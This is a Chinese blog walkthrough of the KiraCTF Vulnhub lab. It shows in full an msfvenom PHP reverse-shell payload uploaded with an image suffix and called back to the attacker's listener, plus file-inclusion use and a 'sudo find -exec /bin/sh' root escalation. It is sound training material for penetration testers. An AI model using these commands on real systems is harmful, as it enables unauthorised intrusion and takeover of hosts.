《Vulhub-KiraCTF靶场实战》

最新推荐文章于 2024-05-17 01:12:56 发布
最新推荐文章于 2024-05-17 01:12:56 发布
阅读量281 收藏
点赞数 1
文章标签: web安全 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47118413/article/details/129280492
版权

KiraCTF靶场通关教程

作者: susususuao
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

一:前言

KiraCTF是vulnhub一个靶机网站,适合初学者进行学习,可以在该网站下载靶机练练手
靶场下载地址:https://mega.nz/file/1WIA0R6K#NMTi2pZIUsRAVlP2ETwMrHFjuZe5na_nfwceIbh8McY

二:KiraCTF靶场搭建与环境部署

环境:

 虚拟机   :VMware Workstation Pro 16
 网络模式 :VMnet1(能够相互通信即可)
 KiraCTF :IP地址:192.168.0.130
 KALI    :IP地址:192.168.0.21

部署KiraCTF:
1.导入虚拟机
在这里插入图片描述2.输入虚拟机名称和路径后点击导入,可能出现报错,但是在点击重试就可以。
3.设置kali和KiraCTF在同一网段,能够正常通信。

三:KiraCTF渗透教学

1. 信息收集

寻找目标主机IP地址

  • 因为是局域网环境,所以就简单的对KiraCTF靶机ip、端口收集下
# arp-scan 192.168.0.0/24    //寻找此网段的其他ip存活主机
# arp-scan -l    //要是不知道此网段可以通过此命令

在这里插入图片描述

  • 因为局域网存在主机较少,所以可以直接判断KiraCTF的ip

寻找目标主机开放的端口

# nmap -sV -p- 192.168.0.130    //扫描本主机所有端口

在这里插入图片描述发现存在有个80端口,习惯性去web去访问一下。
在这里插入图片描述
可以判断此靶场大概是存在文件上传漏洞的。

2.漏洞利用

通过文件上传发现只能上传图片,上传其他会报错,当上传图片成功后会给出上传地址。

在这里插入图片描述
在这里插入图片描述

首页页面含有language功能,访问该功能,似乎有本地文件包含漏洞,确认一下果然存在:

先用whatweb扫下web的,看看有哪些信息:

# whatweb http://192.168.0.130

可以得到是Ubuntu Linux并搭载着Apache[2.4.29]。

在这里插入图片描述

开始验证文件包含漏洞

在这里插入图片描述
在这里插入图片描述
果然存在文件包含漏洞

通过上传phpinfo()测试。

在这里插入图片描述

然后利用msfvenom生成木马

# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.21 lport=1234 R>shell.php

并增加后缀.jpeg,或者用bp抓包在里面添加后缀,只要正常上传就行。

在这里插入图片描述

同时使用msf监听

# msf6 > use exploit/multi/handler 
//设置好payload
# msf6 >set payload php/meterpreter/reverse_tcp
//设置好本机的ip地址和监听的端口号
# msf6 >set LHOST 192.168.0.21
# msf6 >set LPORT 1234
# msf6 >run

同时去访问该shell
在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'   //进入交互式窗口

在这里插入图片描述

先对本路径下的文件进行搜索,发现了有个用户的密码

www-data@bassam-aziz:/var/www/html$ ls
ls
index.html  language.php  supersecret-for-aziz  upload.php  uploads
www-data@bassam-aziz:/var/www/html$ 
www-data@bassam-aziz:/var/www/html$ cd  supersecret-for-aziz
cd  supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls
ls
bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
cat bassam-pass.txt
Password123!@#
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat /etc/passwd

在这里插入图片描述
在这里插入图片描述

登陆

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su bassam    //登陆该用户
su bassam
Password: Password123!@#

bassam@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls
ls
bassam-pass.txt
bassam@bassam-aziz:/var/www/html/supersecret-for-aziz$ cd  
cd 
bassam@bassam-aziz:~$ ls
ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
bassam@bassam-aziz:~$ cat user.txt    //发现一个user.txt文件
cat user.txt
THM{Bassam-Is-Better_Than-KIRA}
bassam@bassam-aziz:~$ cd /root      //发现没权限
cd /root
bash: cd: /root: Permission denied
bassam@bassam-aziz:~$

在这里插入图片描述

接下来就是提权了

bassam@bassam-aziz:~$ sudo -l
sudo -l
[sudo] password for bassam: Password123!@#

Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
bassam@bassam-aziz:~$

可以发现当前用户可以用root身份去运行find,那接下来就find提权

在这里插入图片描述

find提权

bassam@bassam-aziz:~$ id    //查看当前的
id
uid=1000(bassam) gid=1000(bassam) groups=1000(bassam),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit    //一条命令提权
sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
[sudo] password for bassam: Password123!@#id   //获取root权限
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root  //进入root目录
cd /root
# ls    //发现存在flag.txt
ls
flag.txt
# cat flag.txt   //查看
cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}

提权成功!

3.总结和建议

总结:
靶机难度低级,漏洞也明细,通过上传漏洞结合文件包含漏洞获取shell,在后提权,在通过sudo -l发现find提权,最后用find命令成功提权。
建议:
1.对密码的管理(不要存在本机或可以直接查看的目录里)
2.对find命令的错误配置(正确配置find权限)

susu苏打水
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3555
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 959
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
vulnhub靶场实战系列-DC-1实战
最新发布
weixin_45221204的博客
05-17 1076
DC-1靶场中,使用了metaspolit的基础操作,获取到了CMS的关键配置文件,然后对靶机数据库中admin用户的passwd进行修改,在网站后台获取到了关键信息,最后进行了find提权,并获得所有的flag
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7733
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3528
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
vulnhub靶机通关流程 第一关 me and my girlfrioend
qq_57774303的博客
12-04 145
最后找到了问题 但是我不得不吐槽一下virtualbox这个B虚拟化工具真的难用,连ip端口配置真的也是一言难尽,怎么连都连不上网段,然后不得不适用vware虚拟化工具,但是你将把靶场导入虚拟化工具的时候,会报错,这时候先重试,将靶场导入,然后修改网络的时候会报错卡死,是因为靶场太老了,需要手动设置更改适配器。在计算机网络中,以太网是一种常见的局域网(LAN)技术,它使用了一组标准来定义物理层和数据链路层的规范,以实现计算机之间的数据通信。在 nmap 中,选项 "-sC" 是一个用于启用脚本扫描的选项。
Vulhub-master
08-08
kali linux 下搭建 Vulhub 靶场(用于无法科学上网导致的下载失败)
vulhub-master.zip
06-10
Vulhub是一个面向广大安全研究者和爱好者的开源项目,其主要目的是提供一系列的安全漏洞靶场环境。这个项目名为“vulhub-master.zip”的压缩包,包含了一个2020年6月10日更新的Vulhub完整版本。Vulhub的设计理念是...
vulhub-compose.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1786
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub通关手册》—— 03 Raven-1
weixin_53801131的博客
12-28 3660
背景概述: 下载地址:https://www.vulnhub.com/entry/raven-1,256/ 本次的靶机IP为100.10.10.132,将该IP地址添加到hosts文件内,映射到域名raven.local。 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan -l命令进行局域网内部存活主机的扫描。 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 739
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
docker搭建vulhub靶场
weixin_55554070的博客
08-27 1012
近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链接:https://www.jianshu.com/p/8264936cac30 步骤一:确定centos7能上网 步骤二:安装docker需要先
Vulnhub通关手册》——02 Lampiao
weixin_53801131的博客
12-08 1446
Vulnhub通关手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 495
vulhub-XXE靶机通关秘籍~
Vulhub-DC-1靶场实战
weixin_47118413的博客
07-06 2205
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
vulhub通关实战三(附docker vulhub 虚拟机环境)
悦分享
12-28 1069
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。执行如下命令启动漏洞环境 环境启动后,将在4712端口开启一个TCPServer。说一下,除了使用vulhub的docker镜像搭建环境外,我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer:,无需使用vulhub和编写代码。我们使用ysoserial生成payload,然后直接发送给端口即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

susu苏打水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值